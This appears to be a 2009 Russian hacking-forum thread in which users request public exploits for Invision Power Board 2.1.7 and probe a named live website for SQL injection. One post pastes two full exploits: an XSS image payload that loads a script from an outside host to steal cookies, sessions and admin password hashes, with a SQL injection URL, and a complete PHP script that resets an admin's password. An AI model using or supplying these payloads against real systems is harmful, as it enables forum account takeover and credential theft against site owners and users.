04.04.2009, 10:32
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Сообщение от mailbrush
Нет, ссылку указывают тхт, чтобы кто-то не открыл сам шелл. DrAssault тоже прав...
)))
инклудят в большинстве случаев именно тхт(можно инклудить хоть мп3), потому что файл с расширением php интерпретируется на удаленном сервере(в большинстве случаев, если не стоит php_flag engine off), а не потому что "кто-то" может открыть шелл.
|
|
|
04.04.2009, 10:42
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от mailbrush
Если идёт привязка по ипу - ничего не сделаешь.
Так же не стоит забывать что куки временные файлы, возможно что срок действия куков вышел... Какого сервиса куки то?
ЗЫ Iceangel_ прав...
Последний раз редактировалось DrAssault; 04.04.2009 в 10:45..
|
|
|
|
04.04.2009, 18:42
|
|
Новичок
Регистрация: 29.03.2009
Сообщений: 1
С нами:
9010431
Репутация:
0
|
|
На IPB 2.1.7 есть еще рабочие уязвимости ? Я имею ввиду паблик. Спасибо
|
|
|
|
04.04.2009, 18:45
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Есть
Код:
----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]
INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
----[ NITRO ... ]
This vulnerability was already found before, but there was no available
public "figting" exploit for it. This POC consists of several parts - active xss generator,
JS-file, which will be caused at visiting page with xss, log viewer and special component,
which will take necessary data from MySQL forum's tables in case if intercepted session
belonged to the person with moderator privileges.
----[ ANALYSIS ... ]
XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for
future injetion on the forum board. As the reference it is necessary to specify the full way
up to ya.js file (in which you have already preliminary corrected way on your own). Most likely
it is necessary only to press the button.
[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
style=visibility:hidden =[/snapback].gif[/img]
The injection can be executed only when there is available session of the user with access
in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval"
function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50¤t=50&max=3&starter=1+union+select+1/*
----[ RECORD ... ]
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt
}
----[ PATCH ... ]
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
regex_check_image
LINE
924
REPLACE
if ( preg_match( "/[?&;]/", $url) )
ON
if ( preg_match( "/[?&;\<\[]/", $url) )
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
post_db_parse_bbcode
LINE
486
REPLACE
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
ON
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
if ( $row['bbcode_tag'] == 'snapback' )
{
$match[2][$i] = intval( $match[2][$i] );
}
www.underwater.itdefence.ru/isniff.rar
www.milw0rm.com/sploits/2008-isniff.rar
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# milw0rm.com [2008-01-05]
Код:
<?php
/*
Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator
This works if:
"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on
In General Configuration of the forum software.
*/
// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";
// An existing user's login name
$name = "admin";
// The new password(3-32 characters)
$pass = "1234";
// You can use a proxy...
// $proxy = "1.2.3.4:8080";
// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid}®_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}®id={$regid}®_code={$regcode}&pass1={$pass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
# milw0rm.com [2006-11-01]
А если ты на щёт патченых форумов - то врятли!
Последний раз редактировалось -m0rgan-; 04.04.2009 в 18:53..
|
|
|
|
04.04.2009, 18:59
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
http://www.la2onix.ru/?act=news&page='
Тут не похек?
|
|
|
|
04.04.2009, 19:08
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от diznt
http://www.la2onix.ru/?act=news&page='
Тут не похек?
Да все там норм, обыкновенная защита от ботов, тип поля как видно текстовый, максимум моно пути извлечь: /home/la2onix8/public_html/kernel/components/antiddos/anti_ddos.php
От ддоса защищаются собаки))) О скуль инъекции речи нет...
|
|
|
|
04.04.2009, 19:05
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Точно не скажу, ибо после второго запроса мой ip заблочили =///
Но вроде как нет...
http://www.la2onix.ru/?act=news&page=
Здесь раскрытие путей...
|
|
|
|
04.04.2009, 19:06
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
так это ясно что раскрытие путей (не слепой)
возможна скуль? я вот что спрашиваю!
|
|
|
|
04.04.2009, 19:13
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Конечно нет скули, если бы была хоть какая-то надежда (даже блинд), тут бы вывелась вторая страница: http://www.la2onix.ru/?act=news&page=3-1
|
|
|
|
04.04.2009, 19:18
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от mailbrush
Конечно нет скули, если бы была хоть какая-то надежда (даже блинд), тут бы вывелась вторая страница: http://www.la2onix.ru/?act=news&page=3-1
Воу воу попредержите коней, на тип поля внимание обрати!!! Не вывелось бы...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
